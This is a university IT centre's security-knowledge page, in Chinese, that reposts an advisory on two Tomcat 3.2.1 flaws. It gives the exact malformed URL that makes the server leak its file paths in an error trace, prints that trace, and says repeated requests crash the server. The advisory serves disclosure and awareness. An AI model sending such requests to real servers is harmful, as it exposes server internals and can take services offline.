• 立足师大 服务师生

上一个下一个

信息化建设

当前位置:首页>>信息化建设>>安全知识

tomcat可以暴露系统路径和拒绝服务

发布时间:2019-05-07 浏览次数:0

涉及程序: tomcat 详细: Tomcat 是在 Apache 软件环境下开发的一个支持 JSP 和 Servlets 的软件。但是发现它存在两个漏洞: 1、攻击者提交这样的 URL 将能获得系统的一些路径信息: Example: http://host/\\index.jsp Error: 500 Location: /index.jsp Internal Servlet Error: org.apache.jasper.JasperException: Unable to compile class for JSP C:\\tomcat\\jakarta-tomcat-3.2.1\\work\\localhost_8080\\_0002findex_0002ejspindex_jsp_69.java:482: Method autenticate(java.lang.String) not found in class ENTERPRISE.login. if(pubBean.autenticate(password) != 0) ^ C:\\tomcat\\jakarta-tomcat-3.2.1\\work\\localhost_8080\\_0002findex_0002ejspindex_jsp_69.java:664: Method Others methods... 2、拒绝服务漏洞 如果攻击者持续地发送这样类型的请求将能导致服务器完全崩溃 受影响系统: Tomcat v3.2.1 测试环境: Apache 1.3.19 (WinNT 4.0) 解决方案: 尚无


@河北师范大学 信息化中心 设计制作版权所有 网站浏览: 次 冀ICP备18011017号-3   冀公网安备 13010802000630号

地址:中国 河北 石家庄市南二环东路20号 理科楼群1号楼信息化中心 邮编:050024 

联系电话:(86)311-80786300 主任邮箱:liuhz@mail.hebtu.edu.cn